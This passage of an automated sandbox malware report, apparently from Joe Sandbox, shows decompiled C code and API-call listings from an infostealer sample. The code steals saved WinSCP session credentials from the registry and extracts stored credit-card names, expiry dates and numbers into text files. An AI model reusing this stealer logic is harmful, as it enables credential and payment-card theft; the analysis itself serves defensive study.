                                        • lstrcatA.KERNEL32(?,29DCFC40), ref: 29D998BB
                                        • lstrcatA.KERNEL32(?,015A1A10), ref: 29D998C9
                                        • lstrcatA.KERNEL32(?,?), ref: 29D998D7
                                        • lstrcatA.KERNEL32(?,29DCD628), ref: 29D998E3
                                        • lstrcatA.KERNEL32(?,015A1A20), ref: 29D998F0
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D998F8
                                        • lstrcatA.KERNEL32(?,29DCD628), ref: 29D99904
                                        • lstrcatA.KERNEL32(?,015A4B68), ref: 29D999B6
                                        • lstrcatA.KERNEL32(?,?), ref: 29D999D2
                                        • lstrcatA.KERNEL32(?,29DCFC38), ref: 29D999DE
                                        • DeleteFileA.KERNEL32(?), ref: 29D99A5D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File__getptd$AllocateCopyCountDeleteHeapTick_malloc_memset_randwsprintf
                                        • String ID: %s%d
                                        • API String ID: 2973873176-1110647743
                                        • Opcode ID: f6b47a6282c6da553876f1d520a27140851a01a45fc815f2c7e62a32498e4bf7
                                        • Instruction ID: 85186d10f8808acaae9e03bb91c9da687205533d84937aef4c48574e484c08c2
                                        • Opcode Fuzzy Hash: f6b47a6282c6da553876f1d520a27140851a01a45fc815f2c7e62a32498e4bf7
                                        • Instruction Fuzzy Hash: CCA14FB2541258ABD712AB54DC88FDEB7B8FF59B01F008198F509D2240EB389A45EF75
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 65%
                                        			E29D9DA30(CHAR* __ecx) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				char _v283;
                                        				char _v284;
                                        				char _v1308;
                                        				char _v2332;
                                        				char _v3356;
                                        				intOrPtr _v3364;
                                        				int* _v3368;
                                        				char _v3384;
                                        				intOrPtr _v3392;
                                        				int* _v3396;
                                        				int* _v3412;
                                        				intOrPtr _v3420;
                                        				int _v3424;
                                        				int* _v3440;
                                        				intOrPtr _v3448;
                                        				int _v3452;
                                        				int* _v3468;
                                        				intOrPtr _v3476;
                                        				int* _v3480;
                                        				short _v3496;
                                        				intOrPtr _v3504;
                                        				int* _v3508;
                                        				int* _v3524;
                                        				void* _v3528;
                                        				char _v3529;
                                        				int _v3536;
                                        				CHAR* _v3540;
                                        				int _v3544;
                                        				char _v3548;
                                        				char _v3552;
                                        				char _v3556;
                                        				char _v3560;
                                        				char _v3564;
                                        				char _v3568;
                                        				char _v3572;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t135;
                                        				signed int _t136;
                                        				intOrPtr* _t146;
                                        				intOrPtr* _t149;
                                        				intOrPtr* _t156;
                                        				void* _t159;
                                        				CHAR* _t165;
                                        				intOrPtr _t167;
                                        				intOrPtr _t171;
                                        				void* _t172;
                                        				void* _t186;
                                        				int _t189;
                                        				long _t190;
                                        				void* _t193;
                                        				CHAR* _t195;
                                        				CHAR* _t200;
                                        				int* _t213;
                                        				void* _t214;
                                        				intOrPtr _t223;
                                        				void* _t225;
                                        				intOrPtr* _t227;
                                        				intOrPtr* _t246;
                                        				intOrPtr _t247;
                                        				CHAR* _t252;
                                        				CHAR* _t257;
                                        				intOrPtr _t258;
                                        				intOrPtr _t260;
                                        				CHAR* _t261;
                                        				void* _t267;
                                        				void* _t268;
                                        				intOrPtr* _t269;
                                        				intOrPtr* _t270;
                                        				long _t274;
                                        				CHAR* _t278;
                                        				void* _t279;
                                        				signed int _t282;
                                        				void* _t283;
                                        				void* _t288;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC2F9D);
                                        				_push( *[fs:0x0]);
                                        				_t135 =  *0x29dd5664; // 0xd9555f04
                                        				_t136 = _t135 ^ _t282;
                                        				_v20 = _t136;
                                        				_push(_t136);
                                        				 *[fs:0x0] =  &_v16;
                                        				_t213 = 0;
                                        				_t278 = __ecx;
                                        				_v3540 = __ecx;
                                        				_v3544 = 0;
                                        				_v284 = 0;
                                        				E29DB5640( &_v283, 0, 0x103);
                                        				_v3536 = 0x104;
                                        				E29DB5640( &_v2332, 0, 0x400);
                                        				_t245 =  &_v1308;
                                        				E29DB5640( &_v1308, 0, 0x400);
                                        				E29DB5640( &_v3356, 0, 0x400);
                                        				_t288 = _t283 - 0xde4 + 0x30;
                                        				_v3552 = 0x400;
                                        				_v3564 = 0x400;
                                        				_v3548 = 0x400;
                                        				if(RegOpenKeyExW(0x80000001, L"Software\\Martin Prikryl\\WinSCP 2\\Configuration", 0, 1,  &_v3528) != 0) {
                                        					L43:
                                        					 *[fs:0x0] = _v16;
                                        					_pop(_t267);
                                        					_pop(_t279);
                                        					_pop(_t214);
                                        					return E29DADF46(_t144, _t214, _v20 ^ _t282, _t245, _t267, _t279);
                                        				} else {
                                        					_t246 =  *0x29dd80c0; // 0x15a2ff8
                                        					_t146 = _t246;
                                        					_v3448 = 0xf;
                                        					_v3452 = 0;
                                        					_v3468 = 0;
                                        					_t18 = _t146 + 1; // 0x15a2ff9
                                        					_t268 = _t18;
                                        					do {
                                        						_t223 =  *_t146;
                                        						_t146 = _t146 + 1;
                                        					} while (_t223 != 0);
                                        					E29D892C0( &_v3468, _t246, _t146 - _t268);
                                        					_v8 = 0;
                                        					_t269 =  *0x29dd829c; // 0x15a4568
                                        					_t149 = _t269;
                                        					_v3420 = 0xf;
                                        					_v3424 = 0;
                                        					_v3440 = 0;
                                        					_t24 = _t149 + 1; // 0x15a4569
                                        					_t225 = _t24;
                                        					do {
                                        						_t247 =  *_t149;
                                        						_t149 = _t149 + 1;
                                        					} while (_t247 != 0);
                                        					E29D892C0( &_v3440, _t269, _t149 - _t225);
                                        					_v8 = 1;
                                        					_t270 = E29DA4990( &_v3468,  &_v3440,  &_v3384);
                                        					_v8 = 2;
                                        					_t156 = E29DA4990( &_v3440,  &_v3440,  &_v3496);
                                        					_v8 = 3;
                                        					if( *((intOrPtr*)(_t270 + 0x14)) < 8) {
                                        						_t227 = _t270;
                                        					} else {
                                        						_t227 =  *_t270;
                                        					}
                                        					if( *((intOrPtr*)(_t156 + 0x14)) >= 8) {
                                        						_t156 =  *_t156;
                                        					}
                                        					_v3529 =  *0x29dd8368(_v3528, _t156, _t227, 0x10, _t213,  &_v3560,  &_v3572) != 0;
                                        					if(_v3476 >= 8) {
                                        						_push(_v3496);
                                        						E29DADF3B();
                                        						_t288 = _t288 + 4;
                                        					}
                                        					_t245 = 0;
                                        					_v3476 = 7;
                                        					_v3480 = _t213;
                                        					_v3496 = 0;
                                        					if(_v3364 >= 8) {
                                        						_push(_v3384);
                                        						E29DADF3B();
                                        						_t288 = _t288 + 4;
                                        					}
                                        					_v3364 = 7;
                                        					_v3368 = _t213;
                                        					_v3384 = 0;
                                        					if(_v3420 >= 0x10) {
                                        						_t245 = _v3440;
                                        						_push(_v3440);
                                        						E29DADF3B();
                                        						_t288 = _t288 + 4;
                                        					}
                                        					_v8 = 0xffffffff;
                                        					_v3420 = 0xf;
                                        					_v3424 = _t213;
                                        					_v3440 = _t213;
                                        					if(_v3448 >= 0x10) {
                                        						_push(_v3468);
                                        						E29DADF3B();
                                        						_t288 = _t288 + 4;
                                        					}
                                        					_t159 = _v3528;
                                        					_v3448 = 0xf;
                                        					_v3452 = _t213;
                                        					_v3468 = _t213;
                                        					if(_v3529 == _t213) {
                                        						L21:
                                        						if(_t159 != _t213) {
                                        							RegCloseKey(_t159);
                                        							_v3528 = _t213;
                                        						}
                                        						goto L23;
                                        					} else {
                                        						if(_t159 == _t213) {
                                        							L23:
                                        							if(RegOpenKeyExW(0x80000001, L"Software\\Martin Prikryl\\WinSCP 2\\Sessions", _t213, 9,  &_v3528) != 0) {
                                        								goto L43;
                                        							}
                                        							_t245 =  &_v3536;
                                        							if(RegEnumKeyExA(_v3528, _t213,  &_v284,  &_v3536, _t213, _t213, _t213, _t213) != _t213) {
                                        								L41:
                                        								_t144 = _v3528;
                                        								if(_t144 != _t213) {
                                        									_t144 = RegCloseKey(_t144);
                                        								}
                                        								goto L43;
                                        							} else {
                                        								goto L25;
                                        							}
                                        							do {
                                        								L25:
                                        								lstrcatA(_t278, "\n");
                                        								_t252 =  *0x29dd7c3c; // 0x15a4b98
                                        								lstrcatA(_t278, _t252);
                                        								lstrcatA(_t278, "\n");
                                        								_t165 =  *0x29dd81e0; // 0x15a1a10
                                        								lstrcatA(_t278, _t165);
                                        								_t167 =  *0x29dd7b9c; // 0x15a4bb0
                                        								 *0x29dd8408(_v3528,  &_v284, _t167, 2, _t213,  &_v2332,  &_v3552);
                                        								lstrcatA(_t278,  &_v2332);
                                        								_t171 =  *0x29dd7d00; // 0x15a4538
                                        								_v3556 = 4;
                                        								_t172 =  *0x29dd8408(_v3528,  &_v284, _t171, 0xffff, _t213,  &_v3568,  &_v3556);
                                        								_t306 = _t172;
                                        								if(_t172 != 0) {
                                        									lstrcatA(_t278, ":22");
                                        								} else {
                                        									_t200 = E29DA4720( &_v3384, _t306, _v3568);
                                        									_v8 = 4;
                                        									if(_t200[0x14] >= 0x10) {
                                        										_t200 =  *_t200;
                                        									}
                                        									lstrcatA(_t278, _t200);
                                        									_v8 = 0xffffffff;
                                        									if(_v3364 >= 0x10) {
                                        										_push(_v3384);
                                        										E29DADF3B();
                                        										_t288 = _t288 + 4;
                                        									}
                                        									_v3364 = 0xf;
                                        									_v3368 = 0;
                                        									_v3384 = 0;
                                        									_t213 = 0;
                                        								}
                                        								lstrcatA(_t278, "\n");
                                        								_t257 =  *0x29dd7c9c; // 0x15a1a20
                                        								lstrcatA(_t278, _t257);
                                        								_t258 =  *0x29dd8264; // 0x15a4658
                                        								 *0x29dd8408(_v3528,  &_v284, _t258, 2, _t213,  &_v1308,  &_v3564);
                                        								lstrcatA(_t278,  &_v1308);
                                        								_v3392 = 0xf;
                                        								_v3396 = _t213;
                                        								_v3412 = _t213;
                                        								_v8 = 5;
                                        								_t260 =  *0x29dd7e2c; // 0x15a45b0
                                        								 *0x29dd8408(_v3528,  &_v284, _t260, 2, _t213,  &_v3356,  &_v3548);
                                        								lstrcatA(_t278, "\n");
                                        								_t261 =  *0x29dd819c; // 0x15a4b68
                                        								lstrcatA(_t278, _t261);
                                        								_t186 =  *0x29dd8550( &_v3356, 0x29dcd617);
                                        								_t309 = _t186;
                                        								if(_t186 != 0) {
                                        									_t193 = E29D9D2B0( &_v1308,  &_v3356, _t309,  &_v3524,  &_v2332);
                                        									_v8 = 6;
                                        									E29D891D0(_t193,  &_v3412);
                                        									_v8 = 5;
                                        									if(_v3504 >= 0x10) {
                                        										_push(_v3524);
                                        										E29DADF3B();
                                        										_t288 = _t288 + 4;
                                        									}
                                        									_t195 = _v3412;
                                        									_v3504 = 0xf;
                                        									_v3508 = _t213;
                                        									_v3524 = _t213;
                                        									if(_v3392 < 0x10) {
                                        										_t195 =  &_v3412;
                                        									}
                                        									lstrcatA(_v3540, _t195);
                                        									_t278 = _v3540;
                                        								}
                                        								lstrcatA(_t278, "\n\n");
                                        								_t245 = _v3528;
                                        								_t189 = _v3544 + 1;
                                        								_v3536 = 0x104;
                                        								_v3544 = _t189;
                                        								_t190 = RegEnumKeyExA(_v3528, _t189,  &_v284,  &_v3536, _t213, _t213, _t213, _t213);
                                        								_v8 = 0xffffffff;
                                        								_t274 = _t190;
                                        								if(_v3392 >= 0x10) {
                                        									_push(_v3412);
                                        									E29DADF3B();
                                        									_t288 = _t288 + 4;
                                        								}
                                        								_v3392 = 0xf;
                                        								_v3396 = _t213;
                                        								_v3412 = _t213;
                                        							} while (_t274 != 0x103);
                                        							goto L41;
                                        						}
                                        						RegCloseKey(_t159);
                                        						_t159 = 0;
                                        						_v3528 = 0;
                                        						goto L21;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • _memset.LIBCMT ref: 29D9DA81
                                        • _memset.LIBCMT ref: 29D9DAA1
                                        • _memset.LIBCMT ref: 29D9DAB2
                                        • _memset.LIBCMT ref: 29D9DAC3
                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,01599110), ref: 29D9DAF1
                                        • RegGetValueW.ADVAPI32(?,00000000,00000000,00000010,00000000,?,?,?,?,015A4568,015A4569,015A2FF8,015A2FF9), ref: 29D9DBD9
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DCC6
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DCD9
                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?), ref: 29D9DCF9
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 29D9DD21
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DD35
                                        • lstrcatA.KERNEL32(?,015A4B98,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DD43
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DD4F
                                        • lstrcatA.KERNEL32(?,015A1A10,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DD5C
                                        • RegGetValueA.ADVAPI32(?,?,015A4BB0,00000002,00000000,?,?), ref: 29D9DD87
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DD95
                                        • RegGetValueA.ADVAPI32(?,?,015A4538,0000FFFF,00000000,01599110,?), ref: 29D9DDCE
                                        • lstrcatA.KERNEL32(?,00000000,01599110,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DDFB
                                        • lstrcatA.KERNEL32(?,:22,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DE41
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DE4D
                                        • lstrcatA.KERNEL32(?,015A1A20,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DE5B
                                        • RegGetValueA.ADVAPI32(?,?,015A4658,00000002,00000000,?,00000000), ref: 29D9DE87
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DE95
                                        • RegGetValueA.ADVAPI32(?,?,015A45B0,00000002,00000000,?,?), ref: 29D9DEDE
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DEEA
                                        • lstrcatA.KERNEL32(?,015A4B68,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DEF8
                                        • StrCmpCA.SHLWAPI(?,29DCD617,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DF0A
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DF9A
                                        • lstrcatA.KERNEL32(?,29DCFC38,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DFAC
                                        • RegEnumKeyExA.ADVAPI32(?,?,?,00000104,00000000,00000000,00000000,00000000), ref: 29D9DFE3
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9E037
                                        Strings
                                        • :22, xrefs: 29D9DE3B
                                        • Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 29D9DCEF
                                        • Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 29D9DAD5
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Value$_memset$Close$EnumOpen
                                        • String ID: :22$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions
                                        • API String ID: 4181785608-2123096617
                                        • Opcode ID: 2f50bba644b119c1ed9808e2ccbf4deada8d721323b8c27e24c9891b075e8a56
                                        • Instruction ID: 47665783ee9168bc8982247c8b4938bd4a680f20512770aee2d8f59da8b00d40
                                        • Opcode Fuzzy Hash: 2f50bba644b119c1ed9808e2ccbf4deada8d721323b8c27e24c9891b075e8a56
                                        • Instruction Fuzzy Hash: B1023FB2911259AFDB21EF94DC84FDAB7B9AF58700F0081DAE509A7240DB346E85DF70
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 48%
                                        			E29D99F90(CHAR* __ecx, intOrPtr __edx, CHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				char _v284;
                                        				char _v548;
                                        				intOrPtr _v556;
                                        				char _v560;
                                        				char _v576;
                                        				char _v580;
                                        				CHAR* _v584;
                                        				char _v588;
                                        				intOrPtr _v592;
                                        				intOrPtr _v596;
                                        				intOrPtr _v600;
                                        				intOrPtr* _v604;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t58;
                                        				signed int _t59;
                                        				CHAR* _t64;
                                        				signed int _t69;
                                        				void* _t79;
                                        				int _t80;
                                        				long _t82;
                                        				void* _t89;
                                        				int _t90;
                                        				CHAR* _t92;
                                        				CHAR* _t93;
                                        				void* _t107;
                                        				CHAR* _t109;
                                        				void* _t112;
                                        				CHAR* _t116;
                                        				void* _t117;
                                        				intOrPtr* _t133;
                                        				void* _t154;
                                        				void* _t155;
                                        				void* _t156;
                                        				void* _t160;
                                        				CHAR* _t161;
                                        				intOrPtr _t162;
                                        				void* _t163;
                                        				CHAR* _t164;
                                        				signed int _t165;
                                        				void* _t166;
                                        				void* _t170;
                                        				void* _t172;
                                        				void* _t173;
                                        				void* _t178;
                                        				signed int _t179;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC32AB);
                                        				_push( *[fs:0x0]);
                                        				_t58 =  *0x29dd5664; // 0xd9555f04
                                        				_t59 = _t58 ^ _t165;
                                        				_t179 = _t59;
                                        				_v20 = _t59;
                                        				_push(_t160);
                                        				_push(_t154);
                                        				_push(_t59);
                                        				 *[fs:0x0] =  &_v16;
                                        				_t116 = _a4;
                                        				_v596 = __edx;
                                        				_v600 = _a8;
                                        				_v584 = __ecx;
                                        				_v592 = _a12;
                                        				_v604 = _a16;
                                        				E29DB5640( &_v284, 0, 0x104);
                                        				_t64 =  *0x29dd8098; // 0x15a1f98
                                        				lstrcatA( &_v284, _t64);
                                        				_t161 = E29DADFE0( &_v284, _t154, _t160, 0x1a);
                                        				 *_t161 = 0;
                                        				E29DAFCE4(GetTickCount());
                                        				_t170 = _t166 - 0x24c + 0x14;
                                        				_t155 = 0x1a;
                                        				do {
                                        					_t69 = E29DAFCF6(_t179);
                                        					asm("cdq");
                                        					_push(_t69 % 0xa);
                                        					_push(_t161);
                                        					wsprintfA(_t161, "%s%d");
                                        					_t170 = _t170 + 0x10;
                                        					_t155 = _t155 - 1;
                                        				} while (_t155 != 0);
                                        				_t161[0x1a] = 0;
                                        				lstrcatA( &_v284, _t161);
                                        				CopyFileA(_t116,  &_v284, 1);
                                        				E29DB5640( &_v548, _t155, 0x104);
                                        				wsprintfA( &_v548, "\\CC\\%s_%s.txt", _v584, _v600);
                                        				_t162 =  *0x29dd7c30; // 0x158fdd0
                                        				_t79 =  *0x29dd8344( &_v284,  &_v588);
                                        				_t172 = _t170 + 0x24;
                                        				if(_t79 != 0) {
                                        					L16:
                                        					_t80 = DeleteFileA( &_v284);
                                        					 *[fs:0x0] = _v16;
                                        					_pop(_t156);
                                        					_pop(_t163);
                                        					_pop(_t117);
                                        					return E29DADF46(_t80, _t117, _v20 ^ _t165,  &_v284, _t156, _t163);
                                        				}
                                        				_t82 =  *0x29dd82f8(_v588, _t162, 0xffffffff,  &_v580, _t79);
                                        				_t173 = _t172 + 0x14;
                                        				if(_t82 != 0) {
                                        					L15:
                                        					 *0x29dd8318(_v580);
                                        					 *0x29dd8348(_v588);
                                        					goto L16;
                                        				}
                                        				_t164 = HeapAlloc(GetProcessHeap(), _t82, 0xf423f);
                                        				_t89 =  *0x29dd8314(_v580);
                                        				_t173 = _t173 + 4;
                                        				if(_t89 != 0x64) {
                                        					L10:
                                        					_t90 = lstrlenA(_t164);
                                        					_t133 = _v604;
                                        					if(_t133 != 0) {
                                        						__eflags =  *_t133 - 2;
                                        						if( *_t133 == 2) {
                                        							 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t133 + 4)), _t164,  &_v548, _t90, 3);
                                        						} else {
                                        							 *0x29dd8814 = 0x80000;
                                        						}
                                        					} else {
                                        						 *0x29dd8814 = 0x10000;
                                        					}
                                        					goto L15;
                                        				} else {
                                        					goto L5;
                                        				}
                                        				do {
                                        					L5:
                                        					_t92 =  *0x29dd8334(_v580, 0);
                                        					_t93 =  *0x29dd8334(_v580, 1);
                                        					_v584 =  *0x29dd8334(_v580, 2);
                                        					lstrcatA(_t164, "Name: ");
                                        					lstrcatA(_t164, _t92);
                                        					lstrcatA(_t164, "\n");
                                        					lstrcatA(_t164, "Month: ");
                                        					lstrcatA(_t164, _t93);
                                        					lstrcatA(_t164, "\n");
                                        					lstrcatA(_t164, "Year: ");
                                        					lstrcatA(_t164, _v584);
                                        					lstrcatA(_t164, "\n");
                                        					lstrcatA(_t164, "Card: ");
                                        					_t107 =  *0x29dd8320(_v580, 3, _v596, _v592);
                                        					_t109 = E29D99510( &_v576,  *0x29dd8328(), _t107, _v580, 3);
                                        					_t178 = _t173 + 0x30;
                                        					_v8 = 0;
                                        					if(_t109[0x14] >= 0x10) {
                                        						_t109 =  *_t109;
                                        					}
                                        					lstrcatA(_t164, _t109);
                                        					_v8 = 0xffffffff;
                                        					if(_v556 >= 0x10) {
                                        						_push(_v576);
                                        						E29DADF3B();
                                        						_t178 = _t178 + 4;
                                        					}
                                        					_v556 = 0xf;
                                        					_v560 = 0;
                                        					_v576 = 0;
                                        					lstrcatA(_t164, "\n\n");
                                        					_t112 =  *0x29dd8314(_v580);
                                        					_t173 = _t178 + 4;
                                        				} while (_t112 == 0x64);
                                        				goto L10;
                                        			}

                                        APIs
                                        • _memset.LIBCMT ref: 29D99FF6
                                        • lstrcatA.KERNEL32(?,015A1F98,?,?,?), ref: 29D9A00B
                                        • _malloc.LIBCMT ref: 29D9A013
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D9A020
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D9A034
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D9A049
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D9A061
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9A071
                                        • _memset.LIBCMT ref: 29D9A084
                                        • wsprintfA.USER32 ref: 29D9A0A6
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9A0FA
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D9A101
                                        • lstrcatA.KERNEL32(00000000,Name: ), ref: 29D9A162
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9A16A
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9A176
                                        • lstrcatA.KERNEL32(00000000,Month: ), ref: 29D9A182
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9A18A
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9A196
                                        • lstrcatA.KERNEL32(00000000,Year: ), ref: 29D9A1A2
                                        • lstrcatA.KERNEL32(00000000,?), ref: 29D9A1B0
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9A1BC
                                        • lstrcatA.KERNEL32(00000000,Card: ), ref: 29D9A1C8
                                          • Part of subcall function 29D99510: _memset.LIBCMT ref: 29D9958B
                                          • Part of subcall function 29D99510: LocalAlloc.KERNEL32(00000040,-000000E1,D9555F04), ref: 29D995C5
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9A224
                                        • lstrcatA.KERNEL32(00000000,29DCFC38), ref: 29D9A264
                                        • lstrlenA.KERNEL32(00000000), ref: 29D9A284
                                        • DeleteFileA.KERNEL32(?), ref: 29D9A2F1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap_memset$AllocFile__getptdwsprintf$AllocateCopyCountDeleteLocalProcessTick_malloc_randlstrlen
                                        • String ID: %s%d$Card: $Month: $Name: $Year: $\CC\%s_%s.txt
                                        • API String ID: 3275372742-3189770857
                                        • Opcode ID: 0e44e0a542eeb70aa69ea202aac3776831337613a8513608ac95084b0b5295e3
                                        • Instruction ID: d0e45b418f2b1e588aeb9b9f40dd0a6a40384ba4372bfe8943ff0e7832270c74
                                        • Opcode Fuzzy Hash: 0e44e0a542eeb70aa69ea202aac3776831337613a8513608ac95084b0b5295e3
                                        • Instruction Fuzzy Hash: 8791A2B2941254ABD711ABA4DC88F9EB7B8FF58701F04819CF509D7240DA389A85DFB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E29D8F640(CHAR* __ecx, void* __edi) {
                                        				signed int _v8;
                                        				char _v1012;
                                        				char _v2012;
                                        				char _v3012;
                                        				char _v4012;
                                        				char _v5012;
                                        				char _v6012;
                                        				char _v7012;
                                        				char _v8012;
                                        				char _v9012;
                                        				intOrPtr _v9016;
                                        				void* __ebx;
                                        				void* __esi;
                                        				signed int _t67;
                                        				CHAR* _t81;
                                        				CHAR* _t86;
                                        				signed char _t119;
                                        				signed char _t120;
                                        				intOrPtr* _t122;
                                        				intOrPtr* _t125;
                                        				CHAR* _t136;
                                        				char* _t151;
                                        				char* _t152;
                                        				CHAR* _t156;
                                        				CHAR* _t158;
                                        				intOrPtr _t169;
                                        				void* _t170;
                                        				CHAR* _t171;
                                        				signed int _t172;
                                        				void* _t173;
                                        				void* _t182;
                                        				char* _t183;
                                        				char* _t185;
                                        
                                        				_t170 = __edi;
                                        				E29DBCDB0(0x2338);
                                        				_t67 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t67 ^ _t172;
                                        				_t171 = __ecx;
                                        				E29DB5640( &_v4012, 0, 0x3e8);
                                        				E29DB5640( &_v6012, 0, 0x3e8);
                                        				E29DB5640( &_v7012, 0, 0x3e8);
                                        				E29DB5640( &_v8012, 0, 0x3e8);
                                        				E29DB5640( &_v9012, 0, 0x3e8);
                                        				E29DB5640( &_v1012, 0, 0x3e8);
                                        				E29DB5640( &_v3012, 0, 0x3e8);
                                        				E29DB5640( &_v2012, 0, 0x3e8);
                                        				E29DB5640( &_v5012, 0, 0x3e8);
                                        				_t81 =  *0x29dd81f8; // 0x15a19f0
                                        				_t182 = _t173 + 0x6c;
                                        				lstrcatA( &_v4012, _t81);
                                        				_t156 =  *0x29dd7d64; // 0x15a2160
                                        				lstrcatA( &_v6012, _t156);
                                        				_t136 =  *0x29dd8048; // 0x15a19a0
                                        				lstrcatA( &_v7012, _t136);
                                        				_t86 =  *0x29dd7a9c; // 0x15a1b20
                                        				lstrcatA( &_v8012, _t86);
                                        				_t158 =  *0x29dd7f3c; // 0x15a21d8
                                        				lstrcatA( &_v9012, _t158);
                                        				lstrcatA( &_v1012, _t171);
                                        				lstrcatA( &_v1012, "\\");
                                        				lstrcatA( &_v1012,  &_v6012);
                                        				lstrcatA( &_v1012, "\\");
                                        				lstrcatA( &_v1012,  &_v7012);
                                        				lstrcatA( &_v1012, "\\");
                                        				lstrcatA( &_v1012,  &_v8012);
                                        				lstrcatA( &_v3012, _t171);
                                        				lstrcatA( &_v3012, "\\");
                                        				lstrcatA( &_v3012,  &_v6012);
                                        				lstrcatA( &_v3012, "\\");
                                        				lstrcatA( &_v3012,  &_v7012);
                                        				lstrcatA( &_v2012, _t171);
                                        				lstrcatA( &_v2012, "\\");
                                        				lstrcatA( &_v2012,  &_v9012);
                                        				lstrcatA( &_v2012, "\\");
                                        				lstrcatA( &_v2012,  &_v8012);
                                        				lstrcatA( &_v5012, _t171);
                                        				lstrcatA( &_v5012, "\\");
                                        				lstrcatA( &_v5012,  &_v9012);
                                        				_t168 =  &_v1012;
                                        				_t119 = GetFileAttributesA( &_v1012);
                                        				if(_t119 != 0xffffffff && (_t119 & 0x00000010) == 0) {
                                        					_t185 = _t182 - 0x1c;
                                        					_t152 = _t185;
                                        					_t125 =  &_v4012;
                                        					 *((intOrPtr*)(_t152 + 0x14)) = 0xf;
                                        					 *((intOrPtr*)(_t152 + 0x10)) = 0;
